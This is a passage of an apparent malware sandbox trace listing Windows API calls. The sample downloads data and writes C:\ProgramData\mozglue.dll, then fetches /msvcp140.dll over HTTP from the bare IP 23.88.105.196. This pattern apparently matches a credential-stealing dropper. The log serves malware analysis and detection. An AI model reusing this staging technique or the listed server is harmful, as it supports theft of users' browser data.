lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982928*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982d10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982d10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39830f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39830f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39834e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39834e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39838c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39838c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3983cb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3983cb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984098, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984098*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984480, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984480*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984868, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984868*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984c50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984c50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985038, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985038*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985420, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985420*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985808, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985808*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.729] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985bf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985bf0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985fd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985fd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39863c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39863c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39867a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39867a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986b90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986b90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986f78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986f78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.730] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987360, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987360*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987748, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987748*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987b30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987b30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987f18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987f18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988300, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988300*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39886e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39886e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988ad0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988ad0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.731] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988eb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988eb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39892a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39892a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989688, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989688*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989a70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989a70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989e58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989e58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a240, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a240*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.732] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a628, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a628*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398aa10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398aa10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398adf8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398adf8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b1e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b1e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b5c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b5c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b9b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b9b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398bd98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398bd98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.733] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c180, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c180*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c568, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c568*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c950, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c950*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398cd38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398cd38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d120, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d120*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d508, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d508*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.734] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d8f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d8f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398dcd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398dcd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e0c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e0c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e4a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e4a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e890, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e890*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398ec78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398ec78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f060, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f060*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.735] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f448, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f448*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f830, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f830*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398fc18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398fc18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990000, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990000*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39903e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39903e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39907d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39907d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.736] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990bb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990bb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990fa0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990fa0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991388, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991388*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991770, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991770*, lpdwNumberOfBytesRead=0x19f504*=0xa8) returned 1 [0106.737] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991818*, lpdwNumberOfBytesRead=0x19f504*=0x0) returned 1 [0106.742] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0106.742] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.742] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0106.742] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.742] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0106.743] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.743] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.743] CreateFileA (lpFileName="C:\\ProgramData\\\\mozglue.dll" (normalized: "c:\\programdata\\mozglue.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0106.743] WriteFile (in: hFile=0x28, lpBuffer=0x3970048*, nNumberOfBytesToWrite=0x217d0, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3970048*, lpNumberOfBytesWritten=0x19f6e0*=0x217d0, lpOverlapped=0x0) returned 1 [0106.755] CloseHandle (hObject=0x28) returned 1 [0106.760] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0106.760] GetLastError () returned 0x0 [0106.760] SetLastError (dwErrCode=0x0) [0106.760] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0106.760] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0106.760] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0106.760] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/msvcp140.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0106.760] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0106.760] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0106.761] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0106.761] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0106.761] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0106.761] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0106.761] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0106.801] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.801] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970048, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970048*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.805] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970430, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970430*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.806] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970818*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.807] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970c00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970c00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.808] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970fe8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970fe8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.809] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39713d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39713d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.810] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39717b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39717b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.810] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971ba0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971ba0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.810] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971f88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971f88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972370, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972370*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39736f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39736f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.813] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39742b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39742b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975a20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975e08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39761f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39761f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39765d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39765d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39769c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39769c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.815] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3976da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3976da8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977d48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978518, dwNumberOfBytesToRead=0x3e8, 